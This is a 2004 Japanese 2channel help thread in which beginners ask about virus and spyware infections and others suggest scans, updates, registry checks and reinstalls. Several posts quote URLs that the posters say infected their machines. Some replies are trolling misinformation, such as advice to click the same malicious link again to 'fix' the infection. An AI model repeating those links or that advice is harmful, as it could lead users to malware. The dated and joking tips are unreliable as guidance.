なんかギコナビのフォルダ?みたいなのに感染してるのがあったんんですよ。


483 :477:04/07/26 13:26 ID:I6O4w+IW
>>479
ヤフーで検索してシマンテック、トレンドマイクロ、マカフィーの3つへ行ってみたのですが、ウィルススキャンの項目をクリックしても変化がないというか
画面が全然変わりません。シマンテック、トレンドマイクロの2つは。

マカフィーは
>お申し込み処理中

>お待ちください。現在、処理しています。
↑この画面から全く変化がありません。20分以上たった今も…。

484 :ひよこ名無しさん:04/07/26 13:29 ID:t53Ckbxu
>>481
悪戯ってことはPCに害なし?
なんか漏れから変なメールがきたっていう人がいたんでつけど。

485 :ひよこ名無しさん:04/07/26 13:34 ID:???
>>484
それは別件だと思われ。
相手が初心者なら、添付ファイルだけでそう思う。

486 :ひよこ名無しさん:04/07/26 13:36 ID:???
>>484
ウィルスが差出人名を詐称してメールを出していて、
差出人名の人は全然無関係、ということもよくある。

487 :ひよこ名無しさん:04/07/26 13:36 ID:t53Ckbxu
>>485
それが、こっちはメールを1通も送ってないのに
変なメールがあっちに届くらしいんですよ。

488 :ひよこ名無しさん:04/07/26 13:37 ID:???
>>477
店頭で製品版ウイルス駆除ソフトを購入して下さい。

489 :ひよこ名無しさん:04/07/26 13:38 ID:???
>>487
2人ともウイルス検査しろ。
話はそれからだ。

490 :ひよこ名無しさん:04/07/26 13:38 ID:t53Ckbxu
>>486
それは漏れのパソコンがウィルスに感染してるから
そういうことが起こるんですか?
さっきスキャンして感染してるのが3つで全部Unix.Penguinだったんですけど。

491 :ひよこ名無しさん:04/07/26 13:39 ID:???
>>490
Unix.Penguinはイタズラだって言ってるだろ。

492 :ひよこ名無しさん:04/07/26 13:39 ID:t53Ckbxu
>>491
わかりました。ではメールの方は別のウィルスに感染してるってことですか?

493 :ひよこ名無しさん:04/07/26 13:42 ID:???
>>490
次の日本語文を理解しろ。「差出人名の人は全然無関係」
お前の知人がウィルス感染して、ウィルスはそいつのアドレス帳にある
お前の名前を差出人名として使っただけ、ということ。
そうでないばあいもあるけど

494 :ひよこ名無しさん:04/07/26 13:42 ID:???
>>492
そうとは限らない。
相手はちゃんとウイルス検査してるのか?

495 :ひよこ名無しさん:04/07/26 13:45 ID:t53Ckbxu
>>493  >>494
頭劇わるな漏れでも理解できました。さんくすです。
つまり漏れはだいじょうぶなんでつよね。
相手のほうにウィルス検査するようにいっときます。

496 :ひよこ名無しさん:04/07/26 14:32 ID:Q2zKjoBs
http://info.ahnlab.com/english/#

497 :ひよこ名無しさん:04/07/26 14:35 ID:0xAkrDpD
すいません、質問させてもらいます。
僕も>>144氏と同じ状態になってしまったのですが。

ad-awareは前もってインストールできてたので使用できましたけど
これだけでは駆除できなかったみたいです。

で、SPYBOTをインストールしようと試みたのですが
関係のあるサイトを開くとことごとく妨害(?)されてるのかウィンドウが閉じてしまいます。
何度もお気に入り登録させて、やっとのことでダウンロード出来たと思ったら
今度はインストールに失敗しました。と表示されてしまいます。
どーしてなんでしょうか?

498 :ひよこ名無しさん:04/07/26 14:36 ID:Ntdejvdz
普通に完全ウイルススキャンするのと
セーフモードで完全ウイルススキャンするのとでは何が違うのでしょうか?

AVG 

499 :ひよこ名無しさん:04/07/26 14:43 ID:???
>>496 乙
人が悪いな、
オンラインウイルススキャンのサイトなら、そう書いてくれれば良いのに
一応日本サイトも有るようですが、こちらは製品を売っているだけで
オンラインスキャンサービスは行っていないようね。
http://www.ahnlab.co.jp/

500 :ひよこ名無しさん:04/07/26 14:49 ID:???
>>497
アクセスを妨害するスパイウエアがある。
対策はテンプレ参照。

501 :ひよこ名無しさん:04/07/26 15:14 ID:0xAkrDpD
>>500
…え〜と、すみません(汗)

出来ればテンプレのどの辺りにそのアクセス妨害をしてる
スパイウェアの情報が載ってるのか教えてもらえないでしょうか?

502 :ひよこ名無しさん:04/07/26 15:21 ID:???
>>501
Hacker defender。テンプレにあるか知らんが。ぐぐれ

503 :412:04/07/26 15:21 ID:SZrvHIuM
自己レス

窓の手・拡張子から行こう♪ My関連付け Ver2.4・[ツール]←[フォルダオプション]からの関連付けなどいろいろ試してみたのですが、
やはり症状は変わらずでした。。

それで症状がでる直前あたりに復元ポイントがあったので、システムの復元を実行し無事に治すことができました。
システムの復元は便利ですね。

レスをくださった方々有難うございました。

504 :ひよこ名無しさん:04/07/26 15:25 ID:???
>>501
http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

505 :ひよこ名無しさん:04/07/26 16:29 ID:???
オンラインスキャンをやってみたら

JAVA_BYTEVER...A

というのに感染していました
なんか削除すればいいらしんですが、削除の仕方が分かりません
どーすればいいのでしょうか?

506 :ひよこ名無しさん:04/07/26 16:48 ID:???
>>505
それは新たなトロイを呼び込むための橋渡しになるような
ウィルスだから実行されてしまえば後の祭りだ。
WindowsUpdateを欠かさずやっていて、アンチウィルスソフトを
導入している人には無関係なウィルスだけどな。IEのキャッシュ
を消せばそのウィルス自体は消えるだろう。

507 :ひよこ名無しさん:04/07/26 16:51 ID:???
>>505
インターネットのキャッシュを削除。
もう一度スキャン。
それでも見つかったら手動でゴミ箱に入れて削除。
その時に見つかった先がSunJavaのテンプレフォルダ
だったら取り合えず感染はない。

次に下のページにいって応急処置を実行して、
スパイウェアを削除する。

エロサイト見たら…助けてください!まとめページ
ttp://haiiro.info/my/text/template.html

508 :ひよこ名無しさん:04/07/26 17:18 ID:???
ちょっと、ダウンロード先がややこしいので
わけわかめになっている人は、このリンクからダウンロードして下さい

SPYBOT
http://www.download.com/3000-2144-10122137.html?part=104443&subj=dlpage&tag=button

Ad-aware
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button

509 :ひよこ名無しさん:04/07/26 17:21 ID:???
>>508 偽リンク踏むな

510 :ひよこ名無しさん:04/07/26 17:31 ID:???
>>509
download.com は、偽リンクじゃ無いだろ。

511 :505:04/07/26 17:32 ID:???
>>506 507

JAVAのコントロールパネルのキャッシュをクリアしたら削除できました
ありがとーございます

512 :ひよこ名無しさん:04/07/26 17:48 ID:???
>ちょっと、ダウンロード先がややこしいので
んなこたあない(AA略

513 :ひよこ名無しさん:04/07/26 18:22 ID:???
>>508は偽リンクじゃないぞ。

514 :ひよこ名無しさん:04/07/26 19:17 ID:???
>>512
download.com以外のサイトだと
少しややこしい場合も有るよ。

515 :ひよこ名無しさん:04/07/26 19:44 ID:???
>>514
じゃ、ここなら文句ないだろう。Spybotは常にdownload トップ10に入っている。
http://www.filemirrors.com/

Spybot
http://www.filemirrors.com/search.src?type=begins&file=spybotsd13.exe

Ad-aware
http://www.filemirrors.com/search.src?type=begins&file=aaw6181.exe

好きなの落とせ

516 :ひよこ名無しさん:04/07/26 20:27 ID:???
>>515
俺は、初心者に説明するときに体験した話をしただけだ。
俺自身は、別に誘導の必要は無いし、元々>>508の相手が
初心者で困るかもしれないという親切心から出た事だろ。
確かに他のスレで、ダウンロード出来ずに困っている奴を
俺も見た事が有るからレスしたまでだ。
ここは初心者を相手にする所だよな。

517 :ひよこ名無しさん:04/07/26 20:58 ID:???
>>516
知ってる限り、download.comにはたどり着くがの自動ダウンロードが始まらないっていう
ケースしか見たことがない。そういう奴には直リン示してやらないと意味がないだろ。

518 :ひよこ名無しさん:04/07/26 23:25 ID:fpfsn0eq
>>499
いや、ここじゃカンコックの評判悪いからさ。(w
オンラインなのにスキャンだけじゃなく、駆除もしっかり出来るんだよ、実は。

519 :ひよこ名無しさん:04/07/27 00:56 ID:6386COJd
オンラインスキャンってどのくらい時間かかりますか?

520 :ひよこ名無しさん:04/07/27 00:58 ID:???
>>519
はぁ?丸三日かかるよ!

521 :ひよこ名無しさん:04/07/27 00:59 ID:???
>>519
そんなん容量と速度に拠りますがな。

522 :ひよこ名無しさん:04/07/27 01:25 ID:6386COJd
容量と速度って何によってわかりますか?    

523 :ひよこ名無しさん:04/07/27 01:29 ID:???
はぁ?

524 :ひよこ名無しさん:04/07/27 02:16 ID:???
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

525 :ひよこ名無しさん:04/07/27 02:19 ID:???
>>524
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????


526 :ひよこ名無しさん:04/07/27 03:32 ID:???
>>522
????????????????

527 :ひよこ名無しさん:04/07/27 07:56 ID:???
ご愁傷様です

528 :ひよこ名無しさん:04/07/27 12:00 ID:SgNe+9wW
突然今まで行ってたサイト何件かに行けなくなったんですが、こういうの経験した人います?
アク禁はおろか、移転も閉鎖もしてないんですが・・・・。

529 :ひよこ名無しさん:04/07/27 12:04 ID:???
やたら落としまくってると向こう側がブロックしてくるんだよ

530 :ひよこ名無しさん:04/07/27 12:09 ID:???
>>528
( ´_ゝ`)

531 :ひよこ名無しさん:04/07/27 16:06 ID:LYD0nZ/d
ページの右上にある「最小化」「最大化」「閉じる」のボタンが「1」「0」「変な記号」になってるんですが、これはウイルスによるものでしょうか?
OSはWIN98です
家族で共有してるので、いつからそうなったかわからないのですが


532 :ひよこ名無しさん:04/07/27 16:07 ID:???
>>531
★☆★質問の前にこのFAQ集を見てね★☆★
http://pc6.2ch.net/test/read.cgi/pcqa/1077495195/4

533 :531:04/07/27 19:40 ID:???
よむのめんどいです。
教えてください。


534 :ひよこ名無しさん:04/07/27 19:49 ID:???
さあ次のしつもん来い!!

535 :ひよこ名無しさん:04/07/27 19:57 ID:???
ここに書いても、読むのめんどうなんだろうな。

536 :ひよこ名無しさん:04/07/27 22:24 ID:0McJjH69
Windows Update を毎日行っている場合でも、ウィルス対策ソフトを導入する必要がありますか?

537 :ひよこ名無しさん:04/07/27 22:28 ID:???
>>536
当たり前です

538 :ひよこ名無しさん:04/07/27 22:31 ID:0McJjH69
では、ウィルス対策ソフトを導入していれば、Windows Update を実行する必要はありませんか?

539 :ひよこ名無しさん:04/07/27 22:32 ID:???
>>538
別にしたくないならするなよ。誰も頼んでない。

540 :ひよこ名無しさん:04/07/27 22:33 ID:0McJjH69
>>539
するメリットがあるか聞きたいのです。

541 :ひよこ名無しさん:04/07/27 22:33 ID:???
>>540
お前みたいな質問してる奴に理解できるとは思えないけどね。

542 :ひよこ名無しさん:04/07/27 22:33 ID:???
>>538
ここはネタスレじゃないんでお引き取りください


543 :ひよこ名無しさん:04/07/27 22:35 ID:???
両方必要だが、どちらかといえば、WindowsUpdateのほうが重要

544 :ひよこ名無しさん:04/07/27 22:35 ID:???
>>538
いつでも再インストール出来るのなら、何にもしなくて良し

545 :ひよこ名無しさん:04/07/27 22:42 ID:???
>>540
メリットなんか無いよ。
逆で、しないとデメリットがあるからしている。

546 :ひよこ名無しさん:04/07/28 02:30 ID:2FCcEYtp
XPユーザーの初心者です。
NAVで更新も最新にしているのですが、
ウイルス警告・コンピュータ上でウイルスを検出しました・高危険度・VBS.Redlof.A・このファイルを修復できません
と出てしまいました。
具具って見ると昔のウイルスらしく、最新の更新がしてあれば問題ないはずなのに・・・?
不安で夜も眠れません(大げさ)。
よろしくご指導ください。

547 :ひよこ名無しさん:04/07/28 02:33 ID:???
>>546
たまたま見たページがRedlofに感染してて、それを検出しただけくさい
ローカルドライブにウィルススキャンかけて問題なければOK

548 :ひよこ名無しさん:04/07/28 02:36 ID:???
>>546
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T

549 :546:04/07/28 03:21 ID:???
ローカルドライブというのは、リムーバブルとDVD以外のやつのことでしょうか?
やってみたら、脅威は見つかりませんと出ますた。
ありがとうございます。
ところで、完全スキャンでも見つからないウイルスとかあるんでしょうか?
心配性なもので・・・。

550 :ひよこ名無しさん:04/07/28 03:24 ID:???
>>549
そりゃまぁ定義にマッチしないウィルスは引っかからんが
新作踏むヤツは運が悪かったと思って諦める

あんま気にすんな。禿げるぞ

551 :ひよこ名無しさん:04/07/28 03:24 ID:???
>>549
もちろんあるよ。

552 :ひよこ名無しさん:04/07/28 03:55 ID:???
>>549
当たり前、個人が趣味で作ったウィルスで、凄くマイナーなのだったりしたら
ベンダーサイトは対応しない。
未知のウィルス、ヒューリスティックスキャンで認定されなきゃ、素通し。

553 :ひよこ名無しさん:04/07/28 04:01 ID:???
ベンダーサイト---->ベンダーサイド

554 :ひよこ名無しさん:04/07/28 04:32 ID:???
新しいウイルスでも亜種だったら素通しってことにはならんのかね?

555 :ひよこ名無しさん:04/07/28 04:43 ID:???
>>554もちろんそうよ。

556 :ひよこ名無しさん:04/07/28 11:59 ID:tKgi1PAi
ウィルスなのか不明ですがCGIゲーにログインしようとするとパスが消されます。
あと、英単語に勝手にどっかの検索サイトにリンク引かれます。

どういった症状なんでしょうか?
フレームなんかも表示されずに消えます。

初心者スレに書いてこっちに書けばよかったと気付く漏れ。

557 :ひよこ名無しさん:04/07/28 12:01 ID:???
>>556
マルチ死ね

558 :ひよこ名無しさん:04/07/28 12:03 ID:HpF9h+2E
【オンライン3DFPSサッカー】
無料なので是非プレイしてみてください
かなり面白いですよ!!
公式ページ
ttp://210.166.209.16/dreamcup.htm

操作説明
ttp://dreamcop.fc2web.com/index.htm

本スレはこちら
http://game8.2ch.net/test/read.cgi/netgame/1090912460/

559 :ひよこ名無しさん:04/07/28 17:57 ID:wVf0XKyZ
2ちゃんのスレを開いたらノートン先生が反応してびっくり。
どうやってウィルスを仕込んでるんでしょう?

560 :ひよこ名無しさん:04/07/28 17:57 ID:???
>>559
コピペしてるだけだ気にすんな

561 :ひよこ名無しさん:04/07/28 18:29 ID:???
たいていの異常はアドウエアで片付くんですが、今回のはかなり
しぶとく、ウイルスバスター使っても、セーフモードにしてから
アドウエア使っても直りません。どうしたらいんでしょう。

562 :ひよこ名無しさん:04/07/28 18:30 ID:???
>>561
意味不明です
もう寝ましょう

563 :561:04/07/28 18:37 ID:???
            __
    _____(   ()
    | ∧_∧  |  ̄ ̄
   /\(´・ω・`) | ネムレニャイ
   //\\    つ
  //  \\_ ヽ |
  //    //(_)|
  \\  //    |
   \\// ̄ ̄ ̄
     \/

564 :ひよこ名無しさん:04/07/28 19:14 ID:???
寝言か。

565 :ひよこ名無しさん:04/07/28 23:53 ID:kJpQFbP7
ttp://www.alladultjapan.net/BBS_L/IMG/BOX/img20040727062937.jpg
を間違えて踏んでしまいました。
そしたらウイルスに感染したみたいなんです。
どうやったら直るかわからないので、教えていただけないでしょうか?
よろしくお願いいたします。



566 :ひよこ名無しさん:04/07/28 23:58 ID:???
アンチウイルスソフトをお買い上げください。

567 :ひよこ名無しさん:04/07/29 00:04 ID:THZy5gdT
ウイルスバスターで
最新版にアップデイトしてもダメでつ

568 :ひよこ名無しさん:04/07/29 00:07 ID:???
>>567
システムの復元を試せ。

569 :ひよこ名無しさん:04/07/29 00:39 ID:eIb1lBE7
ようやくウイルスバスター他セキュリティソフトを導入することになったのですが
それまでは全くの無防備で
ネットに接続しているときに、まれに画面右下タスクバーの接続アイコン(モニターのマーク)が
何も読み込んでいないのに点灯することが何度もありました。そのときはISDNで、ルーターは無しです。
これは何かを送受信していたということでしょうか。バナー広告等は無いページでした。

一応ウイルススキャンでは異常なし、スパイウェアも無かったのですが…
この状態は普通に起こりうるのでしょうか。

570 :ぼるじょあ ◆yBEncckFOU :04/07/29 00:45 ID:???
>>569
(・3・) エェー 気にすることはないYO


571 :ひよこ名無しさん:04/07/29 00:47 ID:f1TplmYp
ttp://www.border.jp/uploader/img/8978.jpg
これ踏んだら変なのがインストールされました。
そして、それを削除して再起動したらアイコンが全部消えてしまいました。
今ネットカフェからでどうにもならない状態です。
エロい人助けて!

572 :ひよこ名無しさん:04/07/29 00:51 ID:???
>>571
窓の手使え。

573 :ひよこ名無しさん:04/07/29 07:24 ID:GNSIzV56
www.stylite.net/sida-aids-php/ph%20ptx%20048.jpg
これを踏んでしまいました。。。
もうどうしようもないですか。。。

574 :シャープに訣別:04/07/29 07:32 ID:BLbVWeoJ


シャープのエアコンを買う前にお読みください

2年間の間に3台のトラブル。
品質も修理サービスの質ともに最低。
本社と現場営業所との連携もチグハグ。
クレーム発生時の適切な対処期待できません。

http://www.e-horita.net/SHARP/

575 :ひよこ名無しさん:04/07/29 10:24 ID:ZOpeE5bN
IEが開けないんです… 何回かクリックしてると
「メモリーが不足しています。いくつかのプログラムを終了してから−」
が表示されす。
ウィルスをスキャンしてもみつかりません。 教えてください

576 :ひよこ名無しさん:04/07/29 10:35 ID:???
フウン

577 :ひよこ名無しさん:04/07/29 11:15 ID:???
>>575
スパイウェア

578 :ひよこ名無しさん:04/07/29 12:03 ID:ZOpeE5bN
575です。ありがとうございます。
スパイウェアを駆除するソフトは量販店で購入できますか?

579 :ひよこ名無しさん:04/07/29 12:05 ID:???
>>578
今、現在そのようなソフトは余り一般的じゃないね。
海外ソフトが主流で、エロサイトスレのテンプレにいくつかある。

それらの内どれも不完全で一つだけ入れればOKという訳じゃない。



580 :ひよこ名無しさん:04/07/29 12:10 ID:???
>>578
このスレをよく読んで実行。
エロサイト見たら…助けてください!Part34
http://pc6.2ch.net/test/read.cgi/pcqa/1090822781/1-9

581 :ひよこ名無しさん:04/07/29 12:32 ID:???
>>578
お客さん一人ご案内

582 :ひよこ名無しさん:04/07/29 12:37 ID:???
風俗の呼び込みみたいですねw

583 :ひよこ名無しさん:04/07/29 12:56 ID:???
ありがとうございました。 行ってきます

584 :ひよこ名無しさん:04/07/29 13:02 ID:???
>>575
ただのリソース不足では?

585 :ひよこ名無しさん:04/07/29 18:22 ID:???
オンラインスキャンしたらウィルスがものすごくたくさんファイル作ってたので、
面倒くさいからリセットしてしまいたいんですけど、
そういうときって再セットアップでいいんですか?それともOS再インストール?
ファイルはCだけにあるみたいです

586 :ひよこ名無しさん:04/07/29 18:23 ID:???
>>585
ID出せよ。
再セットアップとOS再インストールをどう区別してるんだ?

587 :ひよこ名無しさん:04/07/29 19:13 ID:0Q2gFrFF
ごめんなさい、ID出しました。
再セットアップ→アプリケーション
OS→全部
違うんですか?

588 :ひよこ名無しさん:04/07/29 19:19 ID:???
>>587
OSでもアプリでも、再セットアップ=再インストール。
ウイルスはOSの設定も書き換えてしまうものが多いし、
アプリだけでなく、システムファイルにも感染する。

589 :ひよこ名無しさん:04/07/29 19:24 ID:0Q2gFrFF
では、再セットアップをすればシステムファイルから全て
入れなおせるって事ですか?

590 :ひよこ名無しさん:04/07/29 19:24 ID:???
>>587
その辺は、適当に検索して自分で理解した方がいいよ。
、、、で、
全部入れ直すなら、それが一番確実。
大事なデータをバックアップして(ウイルスチェック忘れるな)から
クリーンインストールしろ。

591 :ひよこ名無しさん:04/07/29 20:51 ID:c8dNLjpJ
今再セットアップしたのですが…
Dドライブの名前がLANNAVI180ってなっててなぞです。
これはウィルス関係あるんでしょうか?

ちなみに今10000ファイルくらい検索した中で感染はまだ0です

592 :ひよこ名無しさん:04/07/29 20:55 ID:???
>>591
それ、CDドライブじゃないか?
CD入ってないか?

593 :ひよこ名無しさん:04/07/29 21:34 ID:KBdiPUVA
>>575
レジストリー再構築すれば治るよ。
再構築が簡単に出来るソフトがあった。
どこか忘れたので、ググってくれ。

594 :ひよこ名無しさん:04/07/29 22:44 ID:/76WmJR5
かなり悪質なウィルスで困っています。
2ちゃんねるでリンク先を踏んでしまったのが原因ですが、
パソコンを立ち上げるたびにデスクトップにSEXというショートカットが現れ、
勝手にIEが起動して、エロサイトに飛んでしまいます
それで英語で「パソコンの動作が遅くなっていないか?
なおしたければカネ払え」みたいなメッセージをきいてきます・・・
他のサイトを見ているときも、突然、同じような現象がおきます。
ウイルスバスターでもスルーされてしまうし、
窓の手で自動実行を削除しても無理です・・・
どうすればいいのでしょうか m(_ _)mよろしくお願いします。


595 :ひよこ名無しさん:04/07/29 22:45 ID:???
>>594
エロサイトスレのテンプレを実行。

596 :ひよこ名無しさん:04/07/29 22:50 ID:???
>>594
同じとこもう一回踏めよ。直る。

597 :ひよこ名無しさん:04/07/29 22:50 ID:/76WmJR5
>>595
ありがとうございます。やってみます。

598 :ひよこ名無しさん:04/07/30 00:42 ID:xT64i0mp
トロイの木馬型?ウイルスとも違ってそうなんですが、変な物が入り込んでしまって困っています。
当方、WinXP Proです。

C:\WINDOWS\System32\wingkpc.dll

というファイルが原因だということは、ノートン・ウイルスセキュリティを使ってわかりましたが、駆除できません。
ノートンでダメで、動作が重くなった(以前よりますます重くなった感が強かった)ためにアンインストールし、ウイルスセキュリティ(ソースネクスト)を買ってスキャンなど試みましたがダメでした。
セーフモードで起動する、
Ad-awareをインストールしてスキャンする、等を試してもまだ残っています。
自分、某オンラインゲームをしてますが、ゲーム中でもウイルスセキュリティの警告が出ることがあり、全画面モードが失われたことにより中断さえしてしまいます。
OSのクリーンインストールしか道は残ってないのでしょうか?よろしくお願いします。



599 :ひよこ名無しさん:04/07/30 00:49 ID:x0iZcqIj
OSはWinXP、IE6です。
ウィルスバスター入れてます。

さっきからやたらと
MS04-011_LSASS_VULNERABILITY
RPC_DCOM_BUFFER_OVERFLOW
この二つが緊急警告として出てくるんですけど、
どうしたらよいのでしょうか?

MS04-011_LSASS_VULNERABILITYについてはリンク先のマイクロソフトのページで
Microsoft Windows XP、Microsoft Windows XP Service Pack 1
というのをインストールしてみましたが変わりません。

RPC_DCOM_BUFFER_OVERFLOWというのは英語なのでさっぱりわかりません…。

アドバイスお願いします。


600 :ひよこ名無しさん:04/07/30 00:49 ID:???
>>598
ノートン・ウィルス・セキュリティって何よ?
ダメって何が?
どういう警告文が出るんだよ?
感染してるのかよ、してないのかよ?

言ってることが意味不明すぎ

601 :ひよこ名無しさん:04/07/30 00:54 ID:???
>>598
検出名ぐらい書け。少し上のレスぐらい嫁。

602 :ひよこ名無しさん:04/07/30 00:55 ID:???
>>598
貴方のスキルだと、クリーンインストールが確実です。

603 :ひよこ名無しさん:04/07/30 00:55 ID:???
>>599
買え

604 :ひよこ名無しさん:04/07/30 01:00 ID:???
>>599
ここでも読んどけ
http://www.microsoft.com/japan/security/security_bulletins/ms04-011e.asp

WindowsUpdateして、ウィルススキャンして、話はそれからだ

605 :ひよこ名無しさん:04/07/30 01:03 ID:???
>>599
http://security.okweb.jp/kotaeru.php3?q=847101

606 :ひよこ名無しさん:04/07/30 01:07 ID:Dn/WgWEK
winXPHomeSP1、IE6SP1、ノートン2004、最新ファイルにアップデート済みです。

先程outlookexplessを起動したら、
W32.Netsky.P@mmのノートンの警告が出ました。
削除したものと検疫されたものがあり、ノートンメイン画面から
「レポート」->「検疫項目」と進むと
ファイル名が「○○○.tmp」
脅威名「不明」
元の場所「C:\Documents and Settings\ユーザー名\Local Settings\Temp」
で3つファイルがありました。
「バックアップ項目」を見ると、
detailes.zip、detailes_使っているメールアドレスアカウントの一つ.zip、
message.scrが2つ、website.zipの計5つがあります。
どれも検疫済みとして受信した日付が入っているのですが、
これは自分のPCは感染しておらず、受信しただけ、検疫済みで問題なし、
と考えていいのでしょうか。
今3通のメールの送信者表示は「シマンテック社の電子メールプロキシ」、
件名は「シマンテック社の電子メールプロキシがメールを削除しました」
になっています。
それと、この「検疫項目」と「バックアップ項目」は削除して構わないでしょうか?


607 :ひよこ名無しさん:04/07/30 01:25 ID:???
>>606
かまわない
詳しくはヘルプ読んでちょ

608 :599:04/07/30 01:28 ID:x0iZcqIj
レスありがとうございます。
Windows Updateのページでインストールの履歴を見たのですが、
KB835732は4月に自動更新してありました。

他には一体何をしたらいいのでしょうか。



609 :ひよこ名無しさん:04/07/30 01:34 ID:???
>>608
自分に返ってるレスちゃんと読め

610 :606:04/07/30 01:39 ID:Dn/WgWEK
レスありがとうございます。
今更やってきたウィルスに思い切りビビっていました。
件名が「シマンテック〜」になっていれば水際で防げている、ということですよね。
「感染していません」と出てくれればはっきり安心できるのにな…。


611 :599:04/07/30 01:53 ID:x0iZcqIj
すいません…
ちゃんと読んでいるつもりなのですが、やはりよくわかりませんでした。
ありがとうございました。

612 :ひよこ名無しさん:04/07/30 02:41 ID:BYh2CgHf
こんなメールが届きました。
差出人:System Anti-Virus Administrator
件名: virus found in sent message "Re: Bad Request"

DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.

Attention: ○○○@yahoo.co.jp(私のメアド)
A virus was found in an Email message you sent.
This Email scanner intercepted it and stopped the entire message
reaching its destination.

The virus was reported to be:
Worm.SomeFool.P

613 :612:04/07/30 02:42 ID:BYh2CgHf
(続き)
Please update your virus scanner/signatures or contact your local
IT support personnel as soon as possible. As you may have a virus
or a Trojan program installed on your system. For any questions
regarding the virus policies of this network, please contact
HostRocket.com Support Personnel. Support may be contacted via
Email at 'support.com' or through the support website
located at http://www.rocketsupport.com.

DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.

Your message was sent with the following envelope:
MAIL FROM: ○○○@yahoo.co.jp
RCPT TO: ×××@sunfinity.co.jp
... and with the following headers:

以下略

私のメアドからウイルスが発信されたということだと思うのですが、
ノートンで完全スキャンしましたが問題ありませんでした。
ちなみにノートンは常駐していますし、WINDOWS UPDATEも定期的に行っています。

一体どういうことなのでしょうか?
PCが感染しているなら対策を採らなければいけないと思いますが、
ウイルスソフトで検出されないならばどう対策してよいのかわかりません。

どなたかアドバイスをお願いします!

614 :612:04/07/30 02:42 ID:BYh2CgHf
(続き)
Please update your virus scanner/signatures or contact your local
IT support personnel as soon as possible. As you may have a virus
or a Trojan program installed on your system. For any questions
regarding the virus policies of this network, please contact
HostRocket.com Support Personnel. Support may be contacted via
Email at 'support.com' or through the support website
located at http://www.rocketsupport.com.

DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.

Your message was sent with the following envelope:
MAIL FROM: ○○○@yahoo.co.jp
RCPT TO: ×××@sunfinity.co.jp
... and with the following headers:

以下略

私のメアドからウイルスが発信されたということだと思うのですが、
ノートンで完全スキャンしましたが問題ありませんでした。
ちなみにノートンは常駐していますし、WINDOWS UPDATEも定期的に行っています。

一体どういうことなのでしょうか?
PCが感染しているなら対策を採らなければいけないと思いますが、
ウイルスソフトで検出されないならばどう対策してよいのかわかりません。

どなたかアドバイスをお願いします!

615 :ひよこ名無しさん:04/07/30 02:45 ID:???
↑気にすんな。禿げるよ。

616 :612:04/07/30 02:47 ID:BYh2CgHf
2重書き込みしてしまい申し訳ありませんでした。

当方のスペックなど書き添えさせていただきます。

[OS] Windows XP Service Pack 1
[IE] 6.0.2800
[Shell32.dll] 6.0.2800
[ComCtl32.dll] 6.0.2800
ノートンアンチウイルス2004(定義ファイルは最新版です。)


617 :ひよこ名無しさん:04/07/30 05:06 ID:???
>>616
その文章の中にウィルス名が書いてあるだろう。それでぐぐれ。

618 :ひよこ名無しさん:04/07/30 07:04 ID:???
>>616
http://oshiete1.goo.ne.jp/kotaeru.php3?q=841642

619 :ひよこ名無しさん:04/07/30 07:08 ID:SCZCMyJw
迂闊にも騙されてエロサイト(?)へのリンクを踏まされてしまい、
TROJ_PORNDIAL.BPと思われるウイルスの侵入を許してしまいました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_PORNDIAL.BP
FWが外部へ接続するプログラムを感知したためexeファイルは削除したのですが、
その実行を命じているレジストリが見つからず、起動する度にエラーが出ます。
どうにも、トレンドマイクロに掲載されているキーがないのです。

検出されたexeファイル(msxmidi.exeとhost32.exe)からウイルス自体の見当は外れていないと思うのですが、
WEBSITEVIEWERというフォルダも作られていませんし、微妙に違うのかもしれません。
どなたかこの症状についての解答をお願いします。

620 :598:04/07/30 07:10 ID:M6bYuNzi
ID変わってるかもしれませんが598です。
状況を書き直します。

OS:Win Pro
IE:6.0.2800
セキュリティソフト:ウィルスセキュリティ2005(ソースネクスト)

当初ノートンを入れていたのですが、アンインストールしてウィルスセキュリティ2005に変えました。
警告文は、
ウイルスを検知しましたが処理しました。ご安心ください。
ファイル:wingkpc.dll
場所:C:/WINDOWS/System32
ウイルス名:W32.Agent.AC.Backdoor

この警告文がとても頻繁に出るので、CWSheldderやAd-wareなどで駆除を試みましたが、いぜん駆除できません。(セーフモードでもやりました。)
フォルダーオプションの「隠してあるファイルを全て表示する」をしてもファイルさえ見つからないヘタれです。

少し上のほうに、

234 :ひよこ名無しさん :04/07/19 19:24 ID:???
>>226
またそのパターンか
それも、そのファイルをインストールしている大元のファイルがあるんじゃないのか?
レジストリのスタートアップを確認しろ。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

と、ありましたが、何のことかわかりませんでした。





621 :ひよこ名無しさん:04/07/30 07:13 ID:???
>>620
http://higaitaisaku.web.infoseek.co.jp/regedit.html

622 :ひよこ名無しさん:04/07/30 10:35 ID:???
>>620
会社は違うがレジストリ関係の場所等の情報は、
ここも参考になる。

TROJ_AGENT.AC
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AC

623 :ひよこ名無しさん:04/07/30 10:41 ID:???
>>620
最近はここに仕掛けるトロイが増えてきている
登録されていたら異常だから、調べてみたら?
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=9286
なかったら、レジストリをwingkpc.dllで検索すると見つかると思うけど、
見つかったら、レジストリから削除する。


624 :ひよこ名無しさん:04/07/30 12:36 ID:wUDrZfxz
Windous XPを使ってるんですが
ちなみにオカシナ所とゆうのは
InternetExplorerの「ツール」メニュー「インターネットオプション」
の場所で「インターネット一時ファイル」の上にある
「ホームページ」のアドレスが『about:blank』とゆうのになってて
設定を変えても最初は変えたとおりに表示されるのですが
しばらくするとまた『about:blank』とゆう表示に戻ってしまうことです

ちなみにギコナビのレスを表示する場所は今までスレを選択してない時は
何も表示されなかったのですが今はその『about:blank』のホームページが
表示されます
分かりにくい文章でスミマセン
誰か助けて下さい。

625 :ひよこ名無しさん:04/07/30 12:37 ID:???
>>624
